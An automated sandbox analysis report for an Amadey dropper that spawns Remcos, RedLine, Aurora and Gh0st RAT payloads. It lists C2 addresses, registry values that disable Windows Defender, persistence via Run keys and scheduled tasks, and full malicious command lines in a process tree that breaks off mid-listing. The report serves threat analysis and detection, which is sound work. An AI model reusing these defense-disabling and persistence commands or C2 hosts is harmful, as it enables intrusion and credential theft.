amadey | 8519d4ea113dd568c204eaf41c364e2191b9ef96b61cd3242901910f7e230e8f

Analysis

max time kernel
13s
max time network
1801s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
05-05-2023 04:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a.exe
Size

5KB
MD5

810d22712c603f545f1f0605aca6adbd
SHA1

fe3f75f05358920b0f62d3d365478d0f96d2fa95
SHA256

8519d4ea113dd568c204eaf41c364e2191b9ef96b61cd3242901910f7e230e8f
SHA512

0c040727c4d147b671ab9c250784420391a0368cbd88fa08254dadef66728535f8b2682394627b3780ee637007ba9d68e853694474c6b80f346b5751e0ff769e
SSDEEP

48:6C7+ildOplcN39fLFpkHaoXJhyPFlL/J3th+kYvd4OU3gp697OulavTqXSfbNtm:qwOfcNVLrkHaoWD7RtwkYvVp2svNzNt

Score

10^/10

amadey aurora gh0strat redline remcos dream evasion infostealer persistence rat stealer trojan upx

Malware Config

Extracted

Family

amadey

Version

3.70

tadogem.com/dF30Hn4m/index.php

Extracted

Family

remcos

Botnet

dream

report1.duckdns.org:3380

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-3IC60X
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
Remcos
take_screenshot_option
false
take_screenshot_time
5

Extracted

Family

aurora

94.142.138.215:8081

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Aurora
Aurora is a crypto wallet stealer written in Golang.
stealer aurora
Gh0st RAT payload 1 IoCs

Processes:

resource yara_rule

C:\dan.exe family_gh0strat
Gh0strat
Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.
rat gh0strat

resource	yara_rule
C:\dan.exe	family_gh0strat

Modifies Windows Defender Real-time Protection settings 3 TTPs 20 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

k2673218.execacls.exea6821364.execmd.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	k2673218.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	cacls.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	cacls.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	k2673218.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	k2673218.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	a6821364.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	a6821364.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	a6821364.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	cacls.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	k2673218.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	k2673218.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	a6821364.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	cacls.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	cacls.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	a6821364.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 26 IoCs

Processes:

photo_560.exefoto0183.exefotocr54.exeHalkbank.exex6794257.exey9553447.exev4750022.exeg9058470.exek2673218.exea6821364.exefotocr541.exey9553447.exek2673218.exefoto01831.exex6794257.exeg9058470.exephoto_5601.exev4750022.exea6821364.exe222.exetmglobalzx.exesecrexzx.exeConhost.exerundll32.exeSetup2.exeam.exe

pid	process
3320	photo_560.exe
4556	foto0183.exe
1500	fotocr54.exe
3224	Halkbank.exe
2744	x6794257.exe
1336	y9553447.exe
1924	v4750022.exe
3856	g9058470.exe
4060	k2673218.exe
3744	a6821364.exe
3008	fotocr541.exe
4824	y9553447.exe
2944	k2673218.exe
3192	foto01831.exe
4760	x6794257.exe
3160	g9058470.exe
3564	photo_5601.exe
3884	v4750022.exe
5088	a6821364.exe
4980	222.exe
5060	tmglobalzx.exe
3512	secrexzx.exe
4380	Conhost.exe
1780	rundll32.exe
4656	Setup2.exe
3012	am.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\DefendUpdate1.exe	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Windows security modification 2 TTPs 3 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

cmd.exek2673218.exea6821364.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	k2673218.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	a6821364.exe

Adds Run key to start application 2 TTPs 24 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

fotocr54.exex6794257.exey9553447.exefotocr541.exey9553447.exefoto01831.exephoto_5601.exefoto0183.exephoto_560.exev4750022.exex6794257.exev4750022.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	fotocr54.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	x6794257.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	y9553447.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\""	fotocr541.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	y9553447.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	foto01831.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	photo_5601.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	foto0183.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	fotocr54.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	photo_560.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	foto0183.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	y9553447.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	v4750022.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	x6794257.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup9 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP010.TMP\\\""	v4750022.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	fotocr541.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup6 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP007.TMP\\\""	foto01831.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup7 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP008.TMP\\\""	x6794257.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup8 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP009.TMP\\\""	photo_5601.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	photo_560.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	x6794257.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	v4750022.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\""	y9553447.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	v4750022.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

167 checkip.dyndns.org
1473 ip-api.com
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

Setup2.exe

pid process

4656 Setup2.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

222.exe

description pid process target process

PID 4980 set thread context of 652 4980 222.exe AppLaunch.exe

flow	ioc
167	checkip.dyndns.org
1473	ip-api.com

pid	process
4656	Setup2.exe

description	pid	process	target process
PID 4980 set thread context of 652	4980	222.exe	AppLaunch.exe

Launches sc.exe 33 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
12720	sc.exe
7964	sc.exe
9552	sc.exe
11728	sc.exe
14032	sc.exe
14248	sc.exe
14208	sc.exe
13500	sc.exe
13008	sc.exe
9700	sc.exe
10320	sc.exe
2156	sc.exe
10412	sc.exe
6336	sc.exe
13724	sc.exe
9588	sc.exe
12188	sc.exe
12488	sc.exe
13456	sc.exe
10532	sc.exe
13124	sc.exe
13472	sc.exe
13708	sc.exe
12452	sc.exe
13560	sc.exe
11472	sc.exe
10704	sc.exe
12920	sc.exe
13144	sc.exe
13192	sc.exe
9660	sc.exe
9532	sc.exe
6700	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 15 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
912	4656	WerFault.exe	Setup2.exe
6980	5332	WerFault.exe	hastly.exe
7336	7872	WerFault.exe	Prynt_Stealer_5.6.exe
7184	4808	WerFault.exe	s2s.exe
9076	4808	WerFault.exe	s2s.exe
9604	4808	WerFault.exe	s2s.exe
7068	8340	WerFault.exe	oneetx.exe
2844	8340	WerFault.exe	oneetx.exe
10804	8340	WerFault.exe	oneetx.exe
10420	8340	WerFault.exe	oneetx.exe
10172	9356	WerFault.exe	wwa.exe
10332	8340	WerFault.exe	oneetx.exe
10748	10244	WerFault.exe	Firefox.exe
8084	10420	WerFault.exe	vbc.exe
12464	10596	WerFault.exe	LicGet.exe

NSIS installer 3 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\Togwcstgxg.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\a\Togwcstgxg.exe	nsis_installer_2
C:\Users\Admin\AppData\Roaming\electrum-4.3.4-setup.exe	nsis_installer_2

Creates scheduled task(s) 1 TTPs 16 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
12980	schtasks.exe
2112	schtasks.exe
9112	schtasks.exe
6436	schtasks.exe
9040	schtasks.exe
8732	schtasks.exe
4716	schtasks.exe
8936	schtasks.exe
12652	schtasks.exe
7864	schtasks.exe
4956	schtasks.exe
10528	schtasks.exe
11848	schtasks.exe
12604	schtasks.exe
11724	schtasks.exe
1032	schtasks.exe

Gathers network information 2 TTPs 4 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exeipconfig.exeipconfig.exeipconfig.exe

pid process

2044 ipconfig.exe
5140 ipconfig.exe
9276 ipconfig.exe
14040 ipconfig.exe
Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

12060 taskkill.exe
1240 taskkill.exe
10660 taskkill.exe
10716 taskkill.exe
Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

8764 reg.exe
10824 reg.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4796 PING.EXE
Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

cacls.exea6821364.exek2673218.exea6821364.exe

pid process

4060 cacls.exe
4060 cacls.exe
3744 a6821364.exe
3744 a6821364.exe
2944 k2673218.exe
2944 k2673218.exe
5088 a6821364.exe
5088 a6821364.exe
5088 a6821364.exe

pid	process
2044	ipconfig.exe
5140	ipconfig.exe
9276	ipconfig.exe
14040	ipconfig.exe

pid	process
12060	taskkill.exe
1240	taskkill.exe
10660	taskkill.exe
10716	taskkill.exe

pid	process
8764	reg.exe
10824	reg.exe

pid	process
4796	PING.EXE

pid	process
4060	cacls.exe
4060	cacls.exe
3744	a6821364.exe
3744	a6821364.exe
2944	k2673218.exe
2944	k2673218.exe
5088	a6821364.exe
5088	a6821364.exe
5088	a6821364.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

a.execacls.exea6821364.exek2673218.exea6821364.exe

description	pid	process
Token: SeDebugPrivilege	3188	a.exe
Token: SeDebugPrivilege	4060	cacls.exe
Token: SeDebugPrivilege	3744	a6821364.exe
Token: SeDebugPrivilege	2944	k2673218.exe
Token: SeDebugPrivilege	5088	a6821364.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

a.exefotocr54.exefoto0183.exephoto_560.exex6794257.exey9553447.exev4750022.exefotocr541.exey9553447.exefoto01831.exex6794257.exephoto_5601.exev4750022.exe

description	pid	process	target process
PID 3188 wrote to memory of 3320	3188	a.exe	photo_560.exe
PID 3188 wrote to memory of 3320	3188	a.exe	photo_560.exe
PID 3188 wrote to memory of 3320	3188	a.exe	photo_560.exe
PID 3188 wrote to memory of 4556	3188	a.exe	foto0183.exe
PID 3188 wrote to memory of 4556	3188	a.exe	foto0183.exe
PID 3188 wrote to memory of 4556	3188	a.exe	foto0183.exe
PID 3188 wrote to memory of 1500	3188	a.exe	fotocr54.exe
PID 3188 wrote to memory of 1500	3188	a.exe	fotocr54.exe
PID 3188 wrote to memory of 1500	3188	a.exe	fotocr54.exe
PID 3188 wrote to memory of 3224	3188	a.exe	Halkbank.exe
PID 3188 wrote to memory of 3224	3188	a.exe	Halkbank.exe
PID 3188 wrote to memory of 3224	3188	a.exe	Halkbank.exe
PID 1500 wrote to memory of 1336	1500	fotocr54.exe	y9553447.exe
PID 1500 wrote to memory of 1336	1500	fotocr54.exe	y9553447.exe
PID 1500 wrote to memory of 1336	1500	fotocr54.exe	y9553447.exe
PID 4556 wrote to memory of 2744	4556	foto0183.exe	x6794257.exe
PID 4556 wrote to memory of 2744	4556	foto0183.exe	x6794257.exe
PID 4556 wrote to memory of 2744	4556	foto0183.exe	x6794257.exe
PID 3320 wrote to memory of 1924	3320	photo_560.exe	v4750022.exe
PID 3320 wrote to memory of 1924	3320	photo_560.exe	v4750022.exe
PID 3320 wrote to memory of 1924	3320	photo_560.exe	v4750022.exe
PID 2744 wrote to memory of 3856	2744	x6794257.exe	g9058470.exe
PID 2744 wrote to memory of 3856	2744	x6794257.exe	g9058470.exe
PID 2744 wrote to memory of 3856	2744	x6794257.exe	g9058470.exe
PID 1336 wrote to memory of 4060	1336	y9553447.exe	k2673218.exe
PID 1336 wrote to memory of 4060	1336	y9553447.exe	k2673218.exe
PID 1924 wrote to memory of 3744	1924	v4750022.exe	a6821364.exe
PID 1924 wrote to memory of 3744	1924	v4750022.exe	a6821364.exe
PID 3188 wrote to memory of 3008	3188	a.exe	fotocr541.exe
PID 3188 wrote to memory of 3008	3188	a.exe	fotocr541.exe
PID 3188 wrote to memory of 3008	3188	a.exe	fotocr541.exe
PID 3008 wrote to memory of 4824	3008	fotocr541.exe	y9553447.exe
PID 3008 wrote to memory of 4824	3008	fotocr541.exe	y9553447.exe
PID 3008 wrote to memory of 4824	3008	fotocr541.exe	y9553447.exe
PID 4824 wrote to memory of 2944	4824	y9553447.exe	k2673218.exe
PID 4824 wrote to memory of 2944	4824	y9553447.exe	k2673218.exe
PID 3188 wrote to memory of 3192	3188	a.exe	foto01831.exe
PID 3188 wrote to memory of 3192	3188	a.exe	foto01831.exe
PID 3188 wrote to memory of 3192	3188	a.exe	foto01831.exe
PID 3192 wrote to memory of 4760	3192	foto01831.exe	x6794257.exe
PID 3192 wrote to memory of 4760	3192	foto01831.exe	x6794257.exe
PID 3192 wrote to memory of 4760	3192	foto01831.exe	x6794257.exe
PID 4760 wrote to memory of 3160	4760	x6794257.exe	g9058470.exe
PID 4760 wrote to memory of 3160	4760	x6794257.exe	g9058470.exe
PID 4760 wrote to memory of 3160	4760	x6794257.exe	g9058470.exe
PID 3188 wrote to memory of 3564	3188	a.exe	photo_5601.exe
PID 3188 wrote to memory of 3564	3188	a.exe	photo_5601.exe
PID 3188 wrote to memory of 3564	3188	a.exe	photo_5601.exe
PID 3564 wrote to memory of 3884	3564	photo_5601.exe	v4750022.exe
PID 3564 wrote to memory of 3884	3564	photo_5601.exe	v4750022.exe
PID 3564 wrote to memory of 3884	3564	photo_5601.exe	v4750022.exe
PID 3884 wrote to memory of 5088	3884	v4750022.exe	a6821364.exe
PID 3884 wrote to memory of 5088	3884	v4750022.exe	a6821364.exe
PID 3188 wrote to memory of 4980	3188	a.exe	222.exe
PID 3188 wrote to memory of 4980	3188	a.exe	222.exe
PID 3188 wrote to memory of 4980	3188	a.exe	222.exe
PID 3188 wrote to memory of 5060	3188	a.exe	tmglobalzx.exe
PID 3188 wrote to memory of 5060	3188	a.exe	tmglobalzx.exe
PID 3188 wrote to memory of 5060	3188	a.exe	tmglobalzx.exe
PID 3188 wrote to memory of 3512	3188	a.exe	secrexzx.exe
PID 3188 wrote to memory of 3512	3188	a.exe	secrexzx.exe
PID 3188 wrote to memory of 3512	3188	a.exe	secrexzx.exe
PID 3188 wrote to memory of 4380	3188	a.exe	Conhost.exe
PID 3188 wrote to memory of 4380	3188	a.exe	Conhost.exe

C:\Users\Admin\AppData\Local\Temp\a.exe
"C:\Users\Admin\AppData\Local\Temp\a.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3188

C:\Users\Admin\AppData\Local\Temp\a\photo_560.exe
"C:\Users\Admin\AppData\Local\Temp\a\photo_560.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3320

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v4750022.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v4750022.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1924

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\a6821364.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\a6821364.exe
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3744

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\b8331973.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\b8331973.exe
4⤵
PID:4264

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d1657721.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d1657721.exe
3⤵
PID:5912

C:\Users\Admin\AppData\Local\Temp\a\foto0183.exe
"C:\Users\Admin\AppData\Local\Temp\a\foto0183.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4556

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x6794257.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x6794257.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2744

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\g9058470.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\g9058470.exe
4⤵
- Executes dropped EXE
PID:3856

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\h6396357.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\h6396357.exe
4⤵
PID:5548

C:\Users\Admin\AppData\Local\Temp\a\fotocr54.exe
"C:\Users\Admin\AppData\Local\Temp\a\fotocr54.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1500

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y9553447.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y9553447.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1336

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\k2673218.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\k2673218.exe
4⤵
- Executes dropped EXE
PID:4060

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\l1644286.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\l1644286.exe
4⤵
PID:4280

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\m8551818.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\m8551818.exe
3⤵
PID:4696

C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
"C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe"
4⤵
PID:1860

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe" /F
5⤵
- Creates scheduled task(s)
PID:2112

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\c3912af058" /P "Admin:N"&&CACLS "..\c3912af058" /P "Admin:R" /E&&Exit
5⤵
PID:2348

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6⤵
PID:2996

C:\Windows\SysWOW64\cacls.exe
CACLS "oneetx.exe" /P "Admin:N"
6⤵
PID:1560

C:\Windows\SysWOW64\cacls.exe
CACLS "oneetx.exe" /P "Admin:R" /E
6⤵
- Modifies Windows Defender Real-time Protection settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4060

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6⤵
PID:6084

C:\Windows\SysWOW64\cacls.exe
CACLS "..\c3912af058" /P "Admin:N"
6⤵
PID:3120

C:\Windows\SysWOW64\cacls.exe
CACLS "..\c3912af058" /P "Admin:R" /E
6⤵
PID:376

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
5⤵
PID:6004

C:\Users\Admin\AppData\Local\Temp\a\Halkbank.exe
"C:\Users\Admin\AppData\Local\Temp\a\Halkbank.exe"
2⤵
- Executes dropped EXE
PID:3224

C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\wscript.exe" Update-ia.c.vbe
3⤵
PID:4184

C:\eegv\eepvjjf.pif
"C:\eegv\eepvjjf.pif" buge.exe
4⤵
PID:1236

C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
5⤵
PID:2756

C:\Users\Admin\AppData\Local\Temp\a\fotocr541.exe
"C:\Users\Admin\AppData\Local\Temp\a\fotocr541.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3008

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\y9553447.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\y9553447.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4824

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\k2673218.exe
C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\k2673218.exe
4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
